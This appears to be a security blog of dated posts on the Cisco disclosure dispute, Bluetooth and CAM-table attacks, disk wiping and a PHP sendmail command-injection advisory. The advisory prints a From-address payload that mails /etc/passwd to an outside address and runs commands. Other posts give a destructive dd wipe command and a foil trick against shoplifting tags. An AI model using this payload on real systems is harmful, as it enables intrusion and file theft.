Bitland.Net Security Notes
Comments? email jwilkins-at-bitland*net
More information on the author at Jonathan Wilkins's home page
RSS feed available at http://www.bitland.net/index.rss
Cybercrime nets more than illegal drugs in 2004 (2006/12/08 15:15)
I just read here that in 2004 computer crime exceeded the illegal drug trade in revenues. Apparently the take was around $105 billion.
Comments on the Cisco Debacle (2005/08/04 14:30)
Update: I just read that Cisco had paid ISS to do the research; if this is true, the following doesn't apply. I've only heard it from one source though.

Michael Lynn released some information on reliable exploitation of Cisco IOS vulnerabilities at this year's Blackhat. He did so over the objection of the company that paid him to do the research and also against Cisco's wishes.

Firstly, some links, with full background: Boing Boing's coverage, Schneier's comments, Tom's comments.

My opinion is that Cisco has made some huge mistakes in handling this incident. Firstly, they sued a security researcher. That's definitely going to cause them a huge amount of pain over the next weeks and months as more and more researchers go after them. Outside of branding your products "Unbreakable", suing researchers is the fastest way to paint a giant bullseye on your back. Secondly, they tried to cover up the research. Everyone close to the industry knows that pretty much any type of vulnerability is exploitable given time. Most are aware that this isn't the first Cisco IOS overflow. FX of Phenoelit spoke a couple of years ago about exploiting them. The only difference is that Michael was able to prevent the box from rebooting by killing off the heap checker and spawn a shell. If Cisco had just kept their mouths shut, this would have gotten almost no press. I was planning on skipping the talk entirely (because I saw FX's talk) until I heard about Cisco's efforts to suppress it. Cisco has also managed to annoy various government agencies that are concerned with critical infrastructure protection. Cisco had an obligation to disclose information like that revealed in Lynn's talk and it's clear that they didn't notify a large number of interested agencies.

ISS has also managed to severely damage themselves. They basically asked one of their researchers to do some outstanding work and then, at the last minute, caved to a vendor over a presentation that didn't actually release new vulnerability information. That's the truly insane part. All of this uproar is over someone saying that you can exploit Cisco hardware. Something anyone involved in security has had to assume since Cisco started shipping gear and that most people knew was confirmed 2 years ago. Despite this, ISS demonstrated that they were willing to kowtow to a vendor over a well known fact. ISS's credibility as a vulnerability research organization is pretty much gone. I predict that a large number of their employees will leave over the next year. Tom argues that ISS had no choice in the matter. I disagree. I don't see why Cisco has a case against them at all. Security companies do security research all the time and release the results. They didn't have to agree to be quiet in the first place. It was only after they agreed to quash the research that they ran into trouble. They also make it easier for future companies to pull the same trick. Next time ISS is about to release an advisory, the vendor just says that they'll sue and watches as ISS drops it.

As for Lynn, I'm pretty sure that he did the right thing. As he saw it, Cisco had this huge vulnerability that they were about to make much worse (by deploying a feature that would make worms trivial to write) and they were obviously willing to hide the research from thousands of security professionals and government agencies that had a need to know. He did violate his NDA with ISS, but I would have thought that ISS's stance on the issue would be much different. Caving in to vendor pressure like this damages them enormously.
Bluetooth Crypto Broken (2005/06/03 13:45)
Slashdot reports on a new threat for Bluetooth devices. It's possible to eavesdrop on conversations and even initiate calls. It turns out it's embarrassingly easy. Bluetooth devices need to be paired in order to talk to each other. In order for this to happen, the user enters a sequence into both devices and they then negotiate a key. Ollie Whitehouse demonstrated a weakness in this process last year wherein you could deduce the key if you could sniff the initial communication. The Bluetooth spec apparently includes an "I forgot my key" message that a device can send to redo this key negotiation. If you are within range, it's trivial to spoof this message. Way to go. Read about the Bluetooth crypto break here
Aluminum Foil Defeats Common Shoplifting Defence (2005/06/01 11:35)
From Hack In The Box: Apparently those anti-shoplifting systems you find all over the place can be defeated by a few layers of aluminum foil. I'm not sure if this applies to all of the variants, but I don't see why it wouldn't. They all rely on being able to get a signal to a small receiver inside the device attached to any item of value.
Corporate Espionage and Driver Vulnerabilities (2005/05/30 09:00)
Since I'm travelling and since these went across Slashdot, I'll be brief. It seems that a bunch of Israeli companies have been trojaning each other to gain competitive information. So far 18 arrests have been made and some large companies have been implicated, including two cell phone providers and Israel's main satellite TV company. Wired's coverage; Slashdot's coverage. Slashdot also points to this SecurityFocus.com article on vulnerabilities in driver software. It's a fairly high-level article, but it's good to see kernel bugs getting greater attention.
XSS Cheat Sheet (2005/05/25 14:15)
RSnake has a really handy XSS Cheat Sheet. It won't help you if you don't understand XSS attacks to begin with, but it's a pretty complete list of variants and obfuscation techniques.
DNS Testing (2005/05/11 15:50)
If you came across this site because you were checking out IDS or firewall logs and have questions, feel free to email me (jwilkins at bitland dot net). I'm currently doing some research on some aspects of various DNS server implementations. I'm not doing anything intrusive, but I am doing a lot of queries against a wide variety of servers.
Wiping disks (2003/10/15 08:00)
Destroying the data on a disk is a fairly complicated thing to do. Peter Gutmann wrote a fairly comprehensive paper on this a few years ago in which he recommended 3 wipes with random data as being sufficient for modern IDE drives. If you agree with him, there's still the issue of how to go about this in a reasonable amount of time. Here's what I do: I use an OpenBSD boot floppy or boot CD and kick it into the shell when it prompts me. Then I use dd with /dev/arandom as the source to overwrite the raw whole-disk device (rwd0c is the 'c' partition of the first IDE disk, i.e. the entire disk):

    dd if=/dev/arandom of=/dev/rwd0c bs=32768

In my experiments, optimal speed was gained by specifying a block size of 32768. Other block sizes may work better with your drive. Do a couple of tests and figure out what's best for you. dd runs until it reaches the end of the device, and hitting Ctrl-T (which sends SIGINFO on OpenBSD) will give you status at any time. Run the command once per pass.

Peter Gutmann's paper on wiping disks
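The procedure above, as an added Python example that is not code from the post: the same multi-pass random overwrite, plus a size check, a verification scan for a known marker, and a timing loop over candidate block sizes to do the block-size comparison the post recommends. It runs against a constructed temporary file standing in for the disk, which is what makes it safe to execute; os.urandom() stands in for OpenBSD's /dev/arandom (an assumption about equivalence for this purpose), and pointing wipe() at a real device path needs root and is irreversible.

```python
"""Multi-pass random overwrite with verification and a block-size trial.

Added example, not code from the post. Mirrors the dd loop against a regular
file standing in for the raw disk device so it is safe to run; os.urandom()
plays the role of OpenBSD's /dev/arandom. Pointing wipe() at a real device
needs root and is irreversible.
"""
import os
import tempfile
import time


def target_size(path):
    """Size in bytes: lseek(SEEK_END) works for regular files and, on most
    Unixes, for block devices too."""
    fd = os.open(path, os.O_RDONLY)
    try:
        return os.lseek(fd, 0, os.SEEK_END)
    finally:
        os.close(fd)


def overwrite_pass(path, block_size, size):
    """One end-to-end pass of random data in block_size chunks; the last chunk
    is shortened so the pass covers exactly `size` bytes. Returns bytes written."""
    fd = os.open(path, os.O_WRONLY)
    try:
        written = 0
        while written < size:
            written += os.write(fd, os.urandom(min(block_size, size - written)))
        os.fsync(fd)  # flush to the device, not just the page cache
        return written
    finally:
        os.close(fd)


def wipe(path, passes=3, block_size=32768):
    """Overwrite the whole target `passes` times (three random passes is the
    count the post takes from Gutmann). Returns the number of bytes covered."""
    size = target_size(path)
    for _ in range(passes):
        if overwrite_pass(path, block_size, size) != size:
            raise IOError("short pass on %s" % path)
    return size


def contains(path, needle, chunk=1 << 20):
    """Verification: True if `needle` still occurs anywhere in the target.
    Keeps len(needle)-1 bytes of the previous chunk so a match straddling two
    reads is not missed."""
    keep = len(needle) - 1
    tail = b""
    with open(path, "rb") as f:
        while True:
            buf = f.read(chunk)
            if not buf:
                return False
            window = tail + buf
            if needle in window:
                return True
            tail = window[-keep:] if keep else b""


def best_block_size(path, candidates=(4096, 32768, 131072)):
    """Time one pass per candidate block size; returns (block_size, seconds)
    of the fastest. Each trial is itself a destructive pass."""
    size = target_size(path)
    timings = {}
    for bs in candidates:
        start = time.perf_counter()
        overwrite_pass(path, bs, size)
        timings[bs] = time.perf_counter() - start
    return min(timings.items(), key=lambda item: item[1])


def demo():
    """Run the whole procedure on a constructed temp file and report the checks."""
    marker = b"TOP-SECRET-PAYLOAD\n"
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(marker * 2000)  # 38000 bytes: deliberately not a multiple of 32768
        path = f.name
    try:
        before = contains(path, marker)
        size = wipe(path)
        after = contains(path, marker)
        best, _ = best_block_size(path)
        return {"marker_before": before, "marker_after": after,
                "size": size, "best_block_size": best}
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo())
```

The verification scan is the part dd alone does not give you: after the last pass, search the device for something you know was on it (a file header, a string from a document) and treat a hit as a failed wipe. The block-size trial is destructive by construction, so run it on the disk you are about to wipe anyway, not on one you still need.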
Taranis Released (CAM Table Poisoning for Switched Ethernet Networks) (2001/09/06 12:00)
I wrote a paper and a tool to perform CAM table poisoning on ethernet switches. From the README:

Taranis redirects traffic on switch hardware by sending spoofed ethernet traffic. This is not the same as an ARP poisoning attack as it affects only the switch, and doesn't rely on ARP packets. Plus, it is virtually invisible because the packets it sends aren't seen on any other port on the switch. Evading detection by an IDS that may be listening on a monitoring port is as simple as changing the type of packet that is sent by the packet spoofing thread.

Full information Here
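The mechanism the README describes, as an added simulation that is not part of Taranis or its paper: a minimal learning switch in Python, one spoofed frame that makes it re-learn the victim's MAC on the attacker's port, and what happens when the victim next transmits. The switch model (learn source MAC to ingress port on every frame, forward to the learned port, flood unknown destinations, never forward a frame back out its ingress port) is standard transparent-bridge behaviour. Addressing the spoofed frame to the attacker's own MAC, so that the switch learns from it but has no other port to forward it to, is this example's choice for making the frame invisible and is an assumption about Taranis, not something the README states. MAC addresses and port numbers are constructed.

```python
"""Learning-switch simulation of CAM table poisoning.

Added example, not the Taranis source. LearningSwitch models only what a
transparent bridge does with MAC addresses: learn source MAC -> ingress port
on every frame, forward to the learned port, flood unknown destinations, and
never send a frame back out the port it arrived on. Addressing the spoofed
frame to the attacker's own MAC, so that the switch learns from it but has
nowhere to forward it, is this example's assumption about how the "invisible"
frame can be built. Addresses and port numbers are constructed.
"""
from collections import namedtuple

Frame = namedtuple("Frame", "src dst")

SERVER = "00:00:00:00:00:01"    # attached to port 1
VICTIM = "00:00:00:00:00:02"    # attached to port 2
ATTACKER = "00:00:00:00:00:03"  # attached to port 3


class LearningSwitch:
    def __init__(self, ports):
        self.ports = list(ports)
        self.cam = {}  # MAC address -> port number

    def receive(self, ingress, frame):
        """Process one frame arriving on `ingress`; return the egress port list."""
        # Unconditional source learning is the whole attack surface: the switch
        # believes whatever source MAC the most recent frame carried.
        self.cam[frame.src] = ingress
        out = self.cam.get(frame.dst)
        if out is None:
            return [p for p in self.ports if p != ingress]  # unknown destination: flood
        if out == ingress:
            return []  # destination lives on the ingress port: nothing to forward
        return [out]


def spoof(switch, attacker_port, victim_mac, attacker_mac):
    """One poisoning frame: source = victim, destination = attacker.
    Returns where the switch forwarded it (expected: nowhere)."""
    return switch.receive(attacker_port, Frame(src=victim_mac, dst=attacker_mac))


def demo():
    sw = LearningSwitch(ports=[1, 2, 3])
    # Each station sends something so the switch learns where they are.
    sw.receive(1, Frame(SERVER, VICTIM))
    sw.receive(2, Frame(VICTIM, SERVER))
    sw.receive(3, Frame(ATTACKER, SERVER))

    before = sw.receive(1, Frame(SERVER, VICTIM))     # delivered to the victim's port
    spoof_egress = spoof(sw, 3, VICTIM, ATTACKER)     # no other port sees the spoof
    after = sw.receive(1, Frame(SERVER, VICTIM))      # now delivered to the attacker's port
    victim_port_while_poisoned = sw.cam[VICTIM]

    # As soon as the victim transmits, the entry flips back; this race is why
    # the spoof has to be sent continuously rather than once.
    sw.receive(2, Frame(VICTIM, SERVER))
    recovered = sw.receive(1, Frame(SERVER, VICTIM))

    return {"before": before, "spoof_egress": spoof_egress, "after": after,
            "victim_port_while_poisoned": victim_port_while_poisoned,
            "recovered": recovered}


if __name__ == "__main__":
    print(demo())
```

The `recovered` result is the reason the README talks about a dedicated packet spoofing thread: every frame the victim sends moves its CAM entry back to the real port, so the attacker has to keep re-sending the spoof faster than the victim talks. Nothing in the spoof reaches ports 1 or 2, which is also why a sensor on a mirror port only sees the effect (the server's traffic arriving on port 3) and not the cause.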
Gnu Privacy Guard (GPG) Tutorial at Unix Review (2001/01/28 12:00)
Unix Review has an excellent article on getting started with GNU Privacy Guard. Read it here
Achilles, tool to assist auditing of web sites (2000/11/16 12:00)
Auditing web code can be a time consuming endeavour. There are a lot of automated tools for testing C code, but few aimed specifically at the various web based scripting languages. Achilles serves as a proxy that will allow you to change input fields on the fly: no more saving web pages, editing them to adjust input lengths, and reloading. Achilles is available at Digizen
IP Stack testing tools (2000/11/16 12:00)
Network stacks need to be tested with hostile input to determine if they're really up to the rigors of the big bad internet. In order to do this testing, you need automatic packet generation tools. These tools are also useful if you have any code that deals with raw IP packets, sniffers for example. ISIC (IP Stack Integrity Checker) is available here. IPTest is a part of Darren Reed's ipfilter package, which is available here.
sequoiasoft's sendmail php script dangerous (2000/11/09 12:00)
Written by Sequoia Software, this script allows execution of arbitrary code by a malicious user. The command line is built by string concatenation and handed to popen(), which runs it through /bin/sh, so the shell, not sendmail, interprets whatever ends up in the From address. If an attacker crafts their return email address carefully, they can make the popen() call execute chosen commands or reveal files.
//The workhorse method, does the actual sending of the mail.
//Doesn't check for errors so be careful!
function Send($sendmail = "/usr/sbin/sendmail") {
    if($this->from == "") {
        $fp = popen($sendmail . " -i " . $this->to, "w");
    } else {
        // $this->from and $this->to are spliced into a shell command line
        // unescaped; the double quotes around the -f value are only shell
        // quoting and can be closed by the attacker.
        $fp = popen($sendmail . " -i -f\"" . $this->from . "\" " .
                    $this->to, "w");
    }
Given the above code fragment, if I provide a From line such as:

    foo@bat.com" evil@mailinator.com < /etc/passwd; touch /tmp/gotcha;

I can have the contents of any file that the webserver account (usually nobody) has access to mailed to an address of my choosing, and can execute commands as that user. The first " in the address closes the quoting around the -f argument, after which the < redirection, the ; separator and everything that follows are plain shell syntax. One thing to watch: the template appends its own closing quote and the To address after the From value, so the injected text has to leave the shell's quoting balanced; otherwise sh rejects the whole line with a syntax error and runs none of it.